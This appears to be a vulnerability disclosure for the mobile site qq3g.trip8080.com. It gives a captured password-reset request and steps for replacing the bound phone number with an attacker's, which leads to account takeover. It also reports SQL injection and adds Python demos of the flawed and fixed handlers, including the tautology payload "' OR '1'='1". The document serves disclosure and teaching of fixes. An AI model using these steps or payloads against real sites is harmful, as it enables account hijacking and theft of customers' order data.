The problematic site is "Changtu Network - 3G colorful version - QQ Mobile Browser cooperative version". Domain name: qq3g.trip8080.com

1. Click "forgot password".
2. Enter the username whose password is to be retrieved.
3. During registration, Changtu requires a mobile phone number for verification, so every user is bound to a mobile phone number, and that number is used to retrieve the password.
4. Click "retrieve password by phone" and capture the request:

    POST /user/findPwdMobile.htm HTTP/1.1
    Host: qq3g.trip8080.com
    Proxy-Connection: keep-alive
    Content-Length: 25
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Origin: http://qq3g.trip8080.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Referer: http://qq3g.trip8080.com/user/findPwdType.htm
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: ...

    mobile=135........&email=

5. Change the value of the "mobile" parameter to the attacker's own phone number ("136.......") and submit.
6. The system does not check whether the submitted mobile number belongs to this user. The attacker therefore receives the verification code, enters it, and reaches the password reset stage, where a new password can be set.

In addition, SQL injection was found: the POST requests can also be submitted as GET, and user input is not strictly filtered, though it is not easy to exploit. Affected functions: order query; order payment.
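To make steps 4 to 6 concrete, here is an added example (not code from the original report or from the site) that models the server side of /user/findPwdMobile.htm: one handler that trusts the client-supplied "mobile" field, as the report describes, beside a fixed handler that only ever sends the code to the number bound to the account. The user store, phone numbers, SMS gateway and the attempt cap in verify_code are all constructed for the demonstration.

```python
"""Added example, not code from the original report: a minimal model of the
/user/findPwdMobile.htm step, showing the reported flaw beside a fixed version.
Users, phone numbers and the SMS gateway are constructed for the demonstration.
"""
import hmac
import secrets

# Constructed user store: at signup every account is bound to one phone number.
USERS = {
    "alice": {"mobile": "13500000001"},
}


class SmsGateway:
    """Stand-in for the real SMS provider; records what would have been sent."""

    def __init__(self):
        self.sent = []  # list of (mobile, text)

    def send(self, mobile, text):
        self.sent.append((mobile, text))


class ResetService:
    MAX_ATTEMPTS = 5  # cap guesses against a 6-digit code (hardening beyond the report)

    def __init__(self, sms):
        self.sms = sms
        self.pending = {}  # username -> {"mobile", "code", "attempts"}

    def _issue(self, username, mobile):
        code = f"{secrets.randbelow(10**6):06d}"
        self.pending[username] = {"mobile": mobile, "code": code, "attempts": 0}
        self.sms.send(mobile, f"Your password reset code is {code}")

    def find_pwd_mobile_vulnerable(self, username, mobile):
        """Mirrors the reported behaviour: the code goes to whatever number
        the client put in the 'mobile' POST field."""
        if username not in USERS:
            return False
        self._issue(username, mobile)
        return True

    def find_pwd_mobile_fixed(self, username, mobile):
        """Fixed: the destination comes from the account record; the
        client-supplied number may only confirm it, never replace it."""
        user = USERS.get(username)
        if user is None:
            return False
        bound = user["mobile"]
        if not hmac.compare_digest(bound, mobile):
            return False  # same result as unknown user: no hint which part was wrong
        self._issue(username, bound)
        return True

    def verify_code(self, username, code):
        """Second step: check the submitted code before allowing a new password."""
        entry = self.pending.get(username)
        if entry is None:
            return False
        entry["attempts"] += 1
        if entry["attempts"] > self.MAX_ATTEMPTS:
            del self.pending[username]  # too many guesses: the code is discarded
            return False
        if hmac.compare_digest(entry["code"], code):
            del self.pending[username]  # single use
            return True
        return False


def attacker_gets_code(handler_name):
    """Replay steps 4-6 against one of the two handlers and report whether the
    attacker's own phone (136...) received a code that verify_code accepts."""
    sms = SmsGateway()
    svc = ResetService(sms)
    handler = getattr(svc, handler_name)
    accepted = handler("alice", "13600000002")  # attacker's number, not alice's
    if not accepted or not sms.sent:
        return False
    mobile, text = sms.sent[-1]
    if mobile != "13600000002":
        return False
    code = text.rsplit(" ", 1)[-1]
    return svc.verify_code("alice", code)


if __name__ == "__main__":
    print("vulnerable handler, attacker gets code:",
          attacker_gets_code("find_pwd_mobile_vulnerable"))
    print("fixed handler, attacker gets code:",
          attacker_gets_code("find_pwd_mobile_fixed"))
```

The point of the fix is that the request parameter is never used as the SMS destination; the server looks the number up from the account and at most compares the submitted value against it. Returning the same result for an unknown user and a wrong number avoids turning the endpoint into an account or phone-number oracle.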
Solution:
1) Strictly verify the user's identity: send the reset code only to the mobile number bound to the account on the server side, never to a number taken from the request.
2) Filter user input: for the order query and order payment endpoints, use parameterized queries rather than relying on filtering alone, and reject GET submissions where the form is meant to be POSTed.
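For the second point, an added example (not code from the original report or from the site) shows why filtering is the weaker fix: an order query built by string concatenation beside the same query with bound parameters, run against an in-memory SQLite table. The table, its rows and the order_no parameter are constructed; the report does not disclose the real schema or endpoint.

```python
"""Added example, not code from the original report: the order-query injection
described above, modelled with an in-memory SQLite table. Schema, rows and the
'order_no' parameter are constructed for the demonstration.
"""
import sqlite3


def make_db():
    """Constructed orders table: two customers, three orders."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (order_no TEXT, user_id INTEGER, amount INTEGER)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", [
        ("A1001", 1, 120),
        ("A1002", 1, 80),
        ("B2001", 2, 300),
    ])
    return conn


def order_query_vulnerable(conn, user_id, order_no):
    """User input pasted into the SQL text: the 'not strictly filtered' pattern.
    A quote in order_no ends the literal and the rest becomes SQL."""
    sql = (f"SELECT order_no, amount FROM orders "
           f"WHERE user_id = {int(user_id)} AND order_no = '{order_no}'")
    return conn.execute(sql).fetchall()


def order_query_fixed(conn, user_id, order_no):
    """Parameterized: values travel separately from the statement, so quotes
    in order_no are data and can never change the query."""
    sql = "SELECT order_no, amount FROM orders WHERE user_id = ? AND order_no = ?"
    return conn.execute(sql, (int(user_id), order_no)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"  # classic tautology; AND binds tighter than OR
    print("vulnerable:", order_query_vulnerable(db, 1, payload))  # every order, all users
    print("fixed:     ", order_query_fixed(db, 1, payload))       # no such order_no
```

The vulnerable query returns other customers' orders because the injected tautology rewrites the WHERE clause; the parameterized query returns nothing because the same text is merely an order number that does not exist.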